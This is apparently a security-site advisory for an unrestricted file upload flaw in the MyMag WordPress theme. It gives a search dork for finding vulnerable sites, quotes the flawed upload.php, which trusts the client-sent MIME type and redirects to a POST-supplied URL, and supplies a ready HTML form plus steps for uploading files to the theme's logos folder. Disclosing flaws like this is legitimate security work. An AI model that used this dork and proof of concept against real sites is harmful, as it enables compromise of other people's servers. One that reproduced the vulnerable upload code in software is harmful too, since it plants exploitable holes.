MyMag wordpress theme Unrestricted File Upload

2017.02.25
pk Habib Ullah (PK) pk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: indexof:wp-content/themes/mymag/images/logos/

upload.php: Code : $dir = "images/logos/"; $url = $_POST['url']; if (is_writable($dir)) { if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/jpeg") || ($_FILES["file"]["type"] == "image/png") || ($_FILES["file"]["type"] == "image/pjpeg")) && ($_FILES["file"]["size"] < 1048576)) { if ($_FILES["file"]["error"] > 0){ echo "Return Code: " . $_FILES["file"]["error"] . "<br />"; } else { $_FILES["file"]["name"] = str_replace(' ', '_' , $_FILES["file"]["name"]); if (file_exists($dir . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists. "; } else { switch($_FILES["file"]["type"]) { case "image/jpeg" : $end = ".jpg"; break; case "image/png" : $end = ".png"; break; case "image/gif" : $end = ".gif"; break; } $newname = time().$end; move_uploaded_file($_FILES["file"]["tmp_name"], $dir . $newname); $file = $newname; $admin = "/wp-admin/themes.php?page=functions.php&pic="; header("Location: $url$admin$file"); Page : /wp-content/themes/mymag/upload.php To exploit : <html> <body> <form action="http://localhost/wp-content/themes/mymag/upload.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="Submit"> </form> </body> </html> Upload the file to the form and submit the form.The file will be uploaded to http://localhost/wp-content/themes/mymag/images/logos


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top